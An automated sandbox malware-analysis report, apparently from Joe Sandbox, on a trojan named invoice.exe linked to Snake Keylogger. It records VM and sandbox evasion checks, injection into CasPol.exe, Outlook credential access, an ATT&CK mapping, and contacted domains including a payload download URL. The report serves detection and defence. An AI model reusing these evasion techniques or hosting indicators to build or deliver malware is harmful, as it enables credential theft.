Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: invoice.exe, 00000001.00000002.8702090248.0000000000658000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEN<

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\invoice.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Ath_CoexAgent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\invoice.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Inkshed\NMDllHost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\invoice.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Inkshed\Mss32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\invoice.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Antimodernly\trever\Hovedinteressers\lang-1059.dll	Jump to dropped file

Source: C:\Users\user\Desktop\invoice.exe	Code function: 1_2_00406268 FindFirstFileA,FindClose,	1_2_00406268
Source: C:\Users\user\Desktop\invoice.exe	Code function: 1_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	1_2_0040572D
Source: C:\Users\user\Desktop\invoice.exe	Code function: 1_2_004026F8 FindFirstFileA,	1_2_004026F8

Source: C:\Users\user\Desktop\invoice.exe	API call chain: ExitProcess graph end node			graph_1-4240
Source: C:\Users\user\Desktop\invoice.exe	API call chain: ExitProcess graph end node			graph_1-4062

Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: invoice.exe, 00000001.00000002.8818311496.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: invoice.exe, 00000001.00000002.8702090248.000000000069E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga
Source: invoice.exe, 00000001.00000002.8818311496.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: invoice.exe, 00000001.00000002.8818311496.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: invoice.exe, 00000001.00000002.8702090248.0000000000658000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exen<
Source: invoice.exe, 00000001.00000002.8818311496.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: invoice.exe, 00000001.00000002.8818311496.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 00000005.00000002.8995413020.0000000006EAC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8995413020.0000000006E3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: invoice.exe, 00000001.00000002.8818311496.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: invoice.exe, 00000001.00000002.8818311496.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: invoice.exe, 00000001.00000002.8818311496.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\invoice.exe

Code function: 1_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

1_2_10001A5D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

Code function: 1_2_00402D48 GetTempPathA,GetTickCount,GetModuleFileNameA,GetFileSize,LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,SetFilePointer,

1_2_00402D48

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\invoice.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F00000

Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\invoice.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

1_2_004031F1

Source: CasPol.exe, 00000005.00000002.9014975295.0000000037959000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.9014975295.00000000378A1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	211 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	1 Disable or Modify Tools	Security Account Manager	1 System Network Configuration Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Access Token Manipulation	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	111 Process Injection	LSA Secrets	15 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
invoice.exe	28%	Virustotal		Browse
invoice.exe	36%	ReversingLabs	Win32.Trojan.Tnega

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Antimodernly\trever\Hovedinteressers\lang-1059.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Ath_CoexAgent.exe	2%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Inkshed\Mss32.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Inkshed\NMDllHost.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\AdvSplash.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.invoice.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491		Download File
1.0.invoice.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491		Download File

Domains

Source	Detection	Scanner	Label	Link
checkip.dyndns.com	0%	Virustotal		Browse
checkip.dyndns.org	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.avast.com0/	0%	Avira URL Cloud	safe
http://checkip.dyndns.org	0%	Avira URL Cloud	safe
http://checkip.dyndns.com	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/	0%	Avira URL Cloud	safe
http://checkip.dyndns.com	0%	Virustotal		Browse
http://checkip.dyndns.org	0%	Virustotal		Browse
http://checkip.dyndns.org/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.184.206	true	false		high
googlehosted.l.googleusercontent.com	142.250.186.33	true	false		high
checkip.dyndns.com	193.122.130.0	true	true	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown
doc-0k-a8-docs.googleusercontent.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://doc-0k-a8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/s4sbn26f0am6hqllsu7edmokcls88pe1/1679060025000/12467729248612761337/*/1v9qH2HQVytFc1xq78jdiMix-1m6jIF0S?e=download&uuid=a6a0f6a4-7f4f-44fa-b2c7-5636188002aa	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org	CasPol.exe, 00000005.00000002.9014975295.0000000037959000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.avast.com0/	invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-0k-a8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/s4sbn26f	CasPol.exe, 00000005.00000003.8679430245.0000000006EFD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8995413020.0000000006E97000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	invoice.exe, invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp, invoice.exe, 00000001.00000000.7326800375.000000000040A000.00000008.00000001.01000000.00000003.sdmp	false		high
http://checkip.dyndns.com	CasPol.exe, 00000005.00000002.9014975295.0000000037959000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp, invoice.exe, 00000001.00000000.7326800375.000000000040A000.00000008.00000001.01000000.00000003.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CasPol.exe, 00000005.00000002.9014975295.00000000378A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	CasPol.exe, 00000005.00000002.8995413020.0000000006E3B000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	true
142.250.184.206	drive.google.com	United States	15169	GOOGLEUS	false
142.250.186.33	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	828743
Start date and time:	2023-03-17 14:30:04 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	invoice.exe
Detection:	MAL
Classification:	mal88.troj.spyw.evad.winEXE@5/19@3/3
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 62.9% (good quality ratio 61.6%) Quality average: 88.1% Quality standard deviation: 21.8%
HCA Information:	Successful, ratio: 90% Number of executed functions: 63 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29
Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, wdcp.microsoft.com
Execution Graph export aborted for target CasPol.exe, PID 1520 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.122.130.0	jljwdT2pVF.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	52FA61DF5567B0069577DFF44111A00A77D641E816236.exe	Get hash	malicious	Unknown	Browse	checkip.dyndns.org/
	Details.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PI-_IF269J0163.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Order_Ref_53089.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	a0OevadlcmeS4nl.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Shipment_Details.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	78k7IvCT2H.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_3000458.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PO_-_002829-2023.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PI-_IF269J0163.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	7elmqWHBcmfCfOP.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Quotation.doc	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	OrderPO-N01289365.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Pre-arrivals_bunker_call.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Shipment_Details.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Sales_contract_PI.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PO-000000056473_pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	RFQ.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Encuentre_la_LPO_adjunta.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	RFQ-GCE-Piping_&_Steel_Requirment.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Vessel_Description.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	jljwdT2pVF.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	New_Order_list.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Remittance_slip.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	52FA61DF5567B0069577DFF44111A00A77D641E816236.exe	Get hash	malicious	Unknown	Browse	193.122.130.0
	Shipment_Detail.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	ARRIVAL_NOTICE.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	vessel_details.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Details.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	KNcPu6PwgIyFBrH.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Requirements Details Attachments _#Uacac#Uc801 #Uc694#Uccad #Uac74.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	product.doc	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Shipment_Details.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	OSS22005693AB.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	PI-_IF269J0163.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	MV_TBN.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
